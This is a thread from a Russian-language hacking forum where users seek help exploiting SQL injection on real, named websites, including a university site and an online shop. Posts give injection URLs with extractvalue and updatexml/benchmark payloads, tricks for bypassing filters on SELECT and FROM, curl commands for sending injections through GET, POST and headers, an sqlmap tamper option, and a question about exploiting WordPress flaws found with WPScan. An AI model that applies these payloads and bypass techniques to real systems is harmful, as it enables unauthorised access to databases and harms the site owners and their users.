Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Помогите раскрутить. Начинает фильтровать, как только FROM появляется в любом виде. Коментил, пробовал что то типа "1,2, .3from". Какие есть варианты обойти это?
    Code:
    http://onua.edu.ua/index.php?option=com_content&view=article&id=161%20and%20extractvalue(0x0a,concat(0x0a,(select%20database())))--+&Itemid=19&lang=uk
     
  2. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    221
    Likes Received:
    119
    Reputations:
    13
    FRfromOM
     
  3. L73898UNIT

    L73898UNIT New Member

    Joined:
    9 Dec 2018
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Сорри, если пишу не туда
    WPScan указал версию сайта 4.9.8 и вывел следуюющее:


    WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution fixed in version 4.9.9
    WordPress <= 5.0 - File Upload to XSS on Apache Web Servers fixed in version 4.9.9
    WordPress <= 5.0 - User Activation Screen Search Engine Indexing fixed in version 4.9.9
    WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins fixed in version 4.9.9
    WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS) fixed in version 4.9.9
    WordPress <= 5.0 - PHP Object Injection via Meta Data fixed in version 4.9.9
    WordPress <= 5.0 - Authenticated Post Type Bypass] fixed in version 4.9.9
    WordPress <= 5.0 - Authenticated File Delete fixed in version 4.9.9

    Интересует конечно PHP Inj..., но эксплоитов не нашел (или плохо искал).
    Может кто подсказать алгоритм действий с данными уязвимостями? Спасибо.
     
  4. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    221
    Likes Received:
    119
    Reputations:
    13
    Так только что ctf закончился как раз на эту тему.

    см. task4 с решениями
     
  5. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
  6. giloo

    giloo New Member

    Joined:
    2 Feb 2019
    Messages:
    28
    Likes Received:
    3
    Reputations:
    4
    Есть аналоги SELECT?
    Нашла уязвимый сайт, вставить можно только PROCEDURE ANALYSE();
    Могу достать пользователя, версию, название бд.
    Но считать данные из таблиц не могу(
    Ругается на "SELECT".
    WAF нету!!!!
     
  7. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Я походу чего то не знаю, но как вытянуть пользователя, версию, название бд без SELECT через PROCEDURE ANALYSE();?
     
  8. giloo

    giloo New Member

    Joined:
    2 Feb 2019
    Messages:
    28
    Likes Received:
    3
    Reputations:
    4
    Через вектор неисполнимого запроса
    Error based.
    Time based.
    updatexml(1,concat(0x3A,benchmark(500000,md5(1))))
     
    karkajoi likes this.
  9. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    А так если по пробовать ?
    updatexml(1,concat(0x3A,benchmark(500000,md5(table_name from information_schema.tables limit 1,1))))
     
  10. giloo

    giloo New Member

    Joined:
    2 Feb 2019
    Messages:
    28
    Likes Received:
    3
    Reputations:
    4
    А здесь начинает уже ругаться на "FROM".
    Причем странно, если я оставляю только table_name или любые другие выражения не совпадающие с синтаксическими, то выходит ошибка:
    Даже если я с исходного запроса(тестирую локально) убираю ORDER BY, ошибка остается прежней. Могу предположить, что PROCEDURE ANALYSE() внутри тела содержит ORDER BY.
     
  11. giloo

    giloo New Member

    Joined:
    2 Feb 2019
    Messages:
    28
    Likes Received:
    3
    Reputations:
    4
    Нашла интересный факт. SELECT, FROM ставить нельзя, но можно "OR" или запятую:
    updatexml(1,concat(0x3A,benchmark(500000,md5(1 or 1))))
     
  12. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Это такой прикол задавать один и тот же вопрос несколько раз? Ответ был дан, варианты предоставлены.
     
    l1ght likes this.
  13. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Как остановить HTTP 302 на базовую страницу при sql inj в новых версиях firefox. Раньше был NoRedirect, но сейчас его не скачать, пробовал Skip Redirect, но он тоже не дает того результата. Какие есть варианты?
     
  14. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Не крутить иньекты через браузер, крутить через curl.
     
    erwerr2321 likes this.
  15. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Можно пример такой команды увидеть?
     
  16. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    curl http://target.ru/?id=sql' - пример для GET
    curl -d "param1=sql'&param2=value2" -X POST http://target.ru - пример для POST
    curl -H "Content-Type: sql'" http://target.ru - пример для заголовков

    Если возникнут вопросы, то curl --help, там скрыта истина.
     
    BenderMR likes this.
  17. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    Добрый не подскажешь, как обходится подобный Waf?
    Code:
    pokrishkin.pro/index.php?route=product/search_auto&tab=disc&width=5&diameter=14&et=31&pcd=150&dia=67.1&manufacturer=1%22
    Параметр: manufacturer
    На двойные кавычки реагирует вызов ошибки
     
  18. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    174
    Reputations:
    119
    Толсто.

    Просить раскрутить RU шоп на RU площадке, это пол ачата под цугундер подведешь. А хотя почему нет. ;)
     
  19. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    47
    Likes Received:
    2
    Reputations:
    5
    доброго времени суток. sql inj в GET запросе, нужно отправить простую команду:
    Code:
    SELECT id FROM #__users LIMIT 0,1
    проблема, как видно, что название таблицы начинается с решётки #. пытал #__users в HEX, но выдаёт ошибку синтаксиса.
    что можно предпринять?
     
  20. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0

    при помощи мепа тебе поможет тампер --tamper=unionalltounion и все выведет и покажет

    ну потом отснифаешь если руками надо
     
    exT1ma4ka likes this.